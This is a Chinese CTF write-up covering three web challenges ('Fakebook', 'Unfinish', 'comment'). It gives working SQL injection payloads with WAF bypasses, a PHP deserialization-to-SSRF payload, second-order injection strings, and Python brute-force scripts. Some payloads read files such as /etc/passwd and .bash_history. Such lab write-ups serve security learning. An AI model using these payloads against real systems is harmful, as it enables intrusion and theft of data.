Fakebook

预期解

join界面注册一个帐号看到有博客地址,猜测可能有SSRF,登录后账户下面有博客内容,不出意外就是SSRF了,简单的试了几个协议发现不行,然后扫描一下目录发现robots.txt

1
2
User-agent: *
Disallow: /user.php.bak

下载这个源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

测试发现no参数处存在sql注入,测试

1
2
3
4
5
6
7
8
9
10
11
?no=1 order by 4
正常

?no=1 order by 5
[*] query error! (Unknown column '5' in 'order clause')

?no=0 union select load_file("/var/www/html/flag.php"),2,3,4
no hack ~_~

?no=0+unIon/**/select/**/1,load_file('/var/www/html/flag.php'),1,1
Notice: unserialize(): Error at offset 0 of 1 bytes in /var/www/html/view.php on line 31
1
2
3
4
暴库,这里有一个坑,不能union select一起使用,所以这里使用了大小写混淆加/**/绕过waf。具体流程如下
view.php?no=-6%20unIon/**/select%201,table_name,3,4%20from%20information_schema.tables%20where%20table_schema=database()
view.php?no=-6%20unIon/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=database()#
view.php?no=-6%20unIon/**/select%201,data,3,4%20from%20users#

img

此处看到一个php序列化,联想之前的ssrf没有被利用,猜测后台是把data反序列化后得到网址,然后再去访问改网址,拿回数据,那么构造poc为

1
2
3
4
5
6
7
8
9
10
11
<?php
class UserInfo{
    public $name = "";
    public $age = 0;
    public $blog = "";
}
$a=new UserInfo();
$a->name="text";
$a->blog="file:///var/www/html/flag.php";
echo serialize($a);
?>
1
/view.php?no=1 unIon/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"text";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

非预期解

SQL注入 load_file

1
2
3
4
5
6
7
8
本地测试
MariaDB [test]> select load_file("/flag");
+--------------------+
| load_file("/flag") |
+--------------------+
| flag{asdczxafa}
   |
+--------------------+

写个脚本爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import requests
import string
url='http://6cd9d24d-628c-457e-9e44-bde9259bce69.node3.buuoj.cn/login.php'
letter = '{}{}0123456789_-{},()'.format(string.ascii_uppercase,string.ascii_lowercase,"{}")
r=""

def BiggerThanMid(payload,num): # if bigger than num,it return True
    payload=payload.format(num)
    
    content=r.get("http://6cd9d24d-628c-457e-9e44-bde9259bce69.node3.buuoj.cn/view.php?no="+payload)
    if "admin" in content.text.encode("utf-8").decode(content.apparent_encoding):
        return True
    else:
        return False


def BinaryInjection(payload):   # maxLength: Assume the maximum length of the database
    min = 1               # 最小的下标
    max = 255     # 最大的下标
    while (max-min)>1:
        mid = (max + min) // 2 # 中间的下标每次向下取整(rounding down)
        if BiggerThanMid(payload,mid) :
            min = mid  # 大于需要的猜的数,则将最小下标变为中间的
        else :
            max = mid  # 小于需要的猜的数,则将最大下标变为中间的
    return max

def databaseLength():
    payload="admin' and if(length(database())>{},1,0)#" # length of database
    return BinaryInjection(payload) 

# this function getxxxName or getFlag
def getxxxName(rawpayload,length=20):
    xxxName=""
    for i in range(1,length):      
        payload=rawpayload.format(i,"{}")
        xxxName+=chr(BinaryInjection(payload))
        print(xxxName)
    return xxxName

if __name__ == "__main__":
    #1 and%20 if(ascii(substr(load_file("var/www/html/flag.php"),{},1))<{},0,1);
    r=requests.session()
    r.post(url,{"username":"1",
            "passwd":"1"
            })
    getLoadFile='if(ascii(substr(load_file("/var/www/html/flag.php"),{},1))>{},1,0)'
    TableName=getxxxName(getLoadFile,80)

$flag = “flag{5452d364-5bc7-4d2a-9257-1dcff9012004}”;

Unfinish

  • 二次注入

题目如下

img

发现就一个登陆页面,于是尝试探测是否存在 register.php 注册页面。发现存在,立即注册登陆,并查看。

img

思路分析

登陆的时候用到的是邮箱和密码,而注册的时候还有一个用户名,而这个用户名却在登陆后显示了,所以我们考虑用户名这里可能存在 二次注入

image-20200311111544854

还有一个点就是,我们抓取注册账号的数据包,一直重放数据包会发现返回的状态码都是 200 ,这里就有可能存在 update注入 ,之后发现并没有更新用户信息,所以应该不存在 update注入 。那我们就针对用户名部分,进行二次注入测试。

注册成功,会得到 302 状态码并跳转至 login.php ;如果注册失败,只会返回 200 状态码。所以构造 payload 如下:

1
email=test@666.com&username=0'%2B(select hex(hex(database())))%2B'0&password=test

img

进行两次hex解码后得到数据库名为web:

1
2
>>> "373736353632".decode('hex').decode('hex')
'web'

至于为什么 payload 要进行两次 hex 加密,看下面这张图就明白了。

img

然后这里还要注意一个问题,就是当数据进过 两次hex 后,会得到较长的一串只含有数字的字符串,当这个长字符串转成数字型数据的时候会变成科学计数法,也就是说会丢失数据精度,如下:

img

所以这里我们使用 substr 每次取10个字符长度与 ‘0’ 相加,这样就不会丢失数据。但是这里使用逗号 , 会出错,所以可以使用类似 substr(‘test’ from 1 for 10) 这种写法来绕过,具体获取 flag 的代码如下:

首先手动注册上20个用户,每个用户负责带出不同位置的数据(脚本注册功能就是不行,登录没啥问题 奇怪了…)

image-20200320090105686

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import requests
import re

url="http://111.198.29.45:30329/"
r=requests.session()
hearders={
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
    "Referer": "http://111.198.29.45:30329/register.php",
    "Content-Type": "application/x-www-form-urlencoded",
    "Host" : "111.198.29.45:30329",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Upgrade-Insecure-Requests": "1",
    "Connection": "close"
}
pattern=re.compile(r'name">\n(.*)<')

def payload(i):
    regist={"email":"{}@a.a".format(i+10),
        "username":"0'%2B(select substr(hex(hex((select * from flag))) from {} for 10))%2B'0".format(i*10+1),
        "password":"a"
    }
    return regist
    
def hex_to_str(s):
    pattern = re.compile(r'[A-Z0-9]{2}')
    return ''.join([chr(i) for i in [int('0x'+str(b), 16) for b in pattern.findall(s) ]])

registDict=[ payload(i) for i in range(20) ]
flag=""
try:
    for i in range(20):
        r.headers.update(hearders)
        r.post(url+"login.php",data={"email":registDict[i]['email'],"password":registDict[i]['password']})
        cont=r.get(url+"index.php")
        res=pattern.search(cont.text)
        res=res.group(1).strip()
        flag=flag+res
        print(hex_to_str(hex_to_str(flag)))

#如果出错,输出具体错误
except requests.RequestException as e:
    print(e)

comment

  • git泄露恢复
  • 二次注入

https://www.cnblogs.com/iamstudy/articles/wangding_4th_game_web_writeup.html

扫描目录发现.git,用githacker(不是githack)下载,然后打开其实是不完整的php文件,然后git查看历史

没有commit的文件或者隐藏起来的 可以进行恢复

先cd到你执行脚本出来的文件夹,然后执行以下命令

(不出意外地话)

img

  • 方法一
1
2
git log --reflog
git reset --hard af36ba2d86ee43cde7b95db513906975cb8ece03(就是第一个红线所指)先git log --reflog查看一下 可疑文件 然后在恢复他
  • 方法二
1
2
git stash list | tee
git stash pop # 或者使用 git stash apply

恢复后的文件write_do.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

如果$_SESSION['login'] != 'yes'则会定位到login.php,在login.php页面发现提示

image-20200314023951209

名字是zhangwei,密码是zhangweixxx,爆破后三位可知密码是zhangwei666,登录后就可进行留言操作了

关键代码

1
2
3
4
5
6
$category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";

可以看出评论的category字段内容直接来自我们之前write写入进去的,所以造成了二次注入

  1. write里面把category字段赋值成123',content=user(),/*

  2. 然后在comment页面提交content内容为*/#来触发

    拼接后的内容就是:

1
2
3
4
5
6
7
8
9
$sql = "insert into comment
            set category = '123',content=user(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

insert into comment
            set category = '123',content=user(),/*',
                content = '*/#',
                bo_id = '$bo_id'

image-20200314025238262

user()的值就被填入content的字段中了

还有一种就是利用DUPLICATE KEY,payload: ',content=database(),bo_id='1' ON DUPLICATE KEY UPDATE category='

查询一下数据库和表没发现flag之类的

1
123',content=(select group_concat(table_name) from information_schema.tables where table_schema=database()),/*

接下来通过load_file()来加载外部文件看看

1
2
3
4
123',content=(select( load_file('/flag'))),/*
没有flag

123',content=(select( load_file('/etc/passwd'))),/*

image-20200314030453013

看到有一个www用户,查看一下这个用户的历史命令

1
2
3
4
5
6
7
8
123',content=(select( load_file('/home/www/.bash_history'))),/*
cd /tmp/
unzip html.zip
rm -f html.zip
cp -r html /var/www/
cd /var/www/html/
rm -f .DS_Store
service apache2 start

可以发现在/tmp/html目录中还有.DS_Store文件

1
123',content=(select( load_file('/tmp/html/.DS_Store'))),/*

image-20200314031755613

发现有些字符无法带出,所以进行hex编码带出

1
123',content=(select hex( load_file('/tmp/html/.DS_Store'))),/*
1
00000001427564310000100000000800000010000000040A000000000000000000000000000000000000000000000800000008000000000000000000000000000000000000000002000000000000000B000000010000100000730074007200610070496C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000B000000090062006F006F007400730074007200610070496C6F63626C6F62000000100000004600000028FFFFFFFFFFFF00000000000B0063006F006D006D0065006E0074002E007000680070496C6F63626C6F6200000010000000CC0000002800000001FFFF000000000003006300730073496C6F63626C6F62000000100000015200000028FFFFFFFFFFFF0000000000190066006C00610067005F0038003900340036006500310066006600310065006500330065003400300066002E007000680070496C6F63626C6F6200000010000001D800000028FFFFFFFFFFFF0000000000050066006F006E00740073496C6F63626C6F62000000100000004600000098FFFFFFFFFFFF0000000000090069006E006400650078002E007000680070496C6F63626C6F6200000010000000CC0000009800000002FFFF000000000002006A0073496C6F63626C6F62000000100000015200000098FFFFFFFFFFFF000000000009006C006F00670069006E002E007000680070496C6F63626C6F6200000010000001D800000098FFFFFFFFFFFF000000000009006D007900730071006C002E007000680070496C6F63626C6F62000000100000004600000108FFFFFFFFFFFF00000000000600760065006E0064006F0072496C6F63626C6F6200000010000000CC00000108FFFFFFFFFFFF00000000000C00770072006900740065005F0064006F002E007000680070496C6F63626C6F62000000100000015200000108FFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000080B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000002000000001000000400000000100000080000000010000010000000001000002000000000100000400000000000000000100001000000000010000200000000001000040000000000100008000000000010001000000000001000200000000000100040000000000010008000000000001001000000000000100200000000000010040000000000001008000000000000101000000000000010200000000000001040000000000000108000000000000011000000000000001200000000000000140000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000100B000000450000040A000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000104445344420000000100000000000000000000000000000000000000000000000200000020000000600000000000000001000000800000000100000100000000010000020000000000000000020000080000001800000000000000000100002000000000010000400000000001000080000000000100010000000000010002000000000001000400000000000100080000000000010010000000000001002000000000000100400000000000010080000000000001010000000000000102000000000000010400000000000001080000000000000110000000000000012000000000000001400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

写个脚本解一下de.py

1
2
3
4
5
6
7
8
9
10
11
12
13
import re
pattern = re.compile(r'[A-Z0-9]{2}')

def hex_to_str(s):
    return ''.join([chr(i) for i in [int('0x'+str(b), 16) for b in pattern.findall(s) ]])


#raw=""
#with open('raw','r') as f:
#    raw=f.readlines()
#raw=str(raw)
raw="3C3F7068700A24666C6167203D2027666C61677B66396361316136622D396437382D313165382D393061332D6334623330316237623939627D273B0A3F3E0A"
print(hex_to_str(raw))

image-20200314044537867

发现flag_8946e1ff1ee3e40f.php

也可以用ASCII在线转换器

主要部分,粘贴到sublime里看看

1
2
 Bud1
bootstrapIlocblobF(ÿÿÿÿÿÿcomment.phpIlocblobÌ(ÿÿcssIlocblobR(ÿÿÿÿÿÿflag_8946e1ff1ee3e40f.phpIlocblobØ(ÿÿÿÿÿÿfontsIlocblobF˜ÿÿÿÿÿÿ	index.phpIlocblob̘ÿÿjsIlocblobR˜ÿÿÿÿÿÿ	login.phpIlocblobؘÿÿÿÿÿÿ	mysql.phpIlocblobFÿÿÿÿÿÿvendorIlocblobÌÿÿÿÿÿÿwrite_do.phpIlocblobRÿÿÿÿÿÿ

image-20200314035719762

读取flag_8946e1ff1ee3e40f.php

1
123',content=(select hex( load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'))),/*
1
3C3F7068700A24666C6167203D2027666C61677B66396361316136622D396437382D313165382D393061332D6334623330316237623939627D273B0A3F3E0A

在用脚本解密一下

image-20200314044702306

在buuctf怎么提交flag都不对。。

先知社区